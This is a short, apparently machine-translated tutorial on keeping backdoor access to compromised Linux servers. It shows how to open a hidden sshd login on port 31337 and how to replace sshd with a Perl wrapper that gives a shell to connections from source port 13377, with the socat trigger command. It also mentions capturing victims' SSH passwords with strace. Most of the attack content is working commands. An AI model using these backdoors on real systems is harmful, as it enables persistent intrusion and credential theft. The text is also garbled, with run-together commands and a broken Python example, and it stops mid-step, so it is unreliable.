SSH penetration Techniques

Use tips as the rookie administrator. 1. After the intrusion is obtained by SHELL, the firewall of the other party has no restrictions and wants to quickly open an SSH port that can be accessed

Execute on Broilers

 

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

 

A port 31337 is derived and connected to port 31337. Use root/bin/ftp/mail as the user name and password to log on.

:

 

2. Create an SSH wrapper backdoor. The effect is better than that of the first one. No additional ports are opened. You only need to enable the SSH service on the opposite side to remotely connect to the backend server.

Run:

 

[root@localhost ~]# cd /usr/sbin[root@localhost sbin]# mv sshd ../bin[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd[root@localhost sbin]# chmod u+x sshd[root@localhost sbin]# /etc/init.d/sshd restart

 

Run the following command on the local machine:

 

socat STDIO TCP4:10.18.180.20:22,sourceport=13377

 

If you want to modify the source port, you can use the python struct standard library.

 

>>> import struct>>> buffer = struct.pack('>I6',19526)>>> print repr(buffer)'\x00\x00LF'>>> buffer = struct.pack('>I6',13377)>>> print buffer4A

 

As follows:

3. Record the SSH client connection password

After the host is completed, you often want to record the password of the zombie SSH connection to other hosts to further expand the result, just use the strace command.

: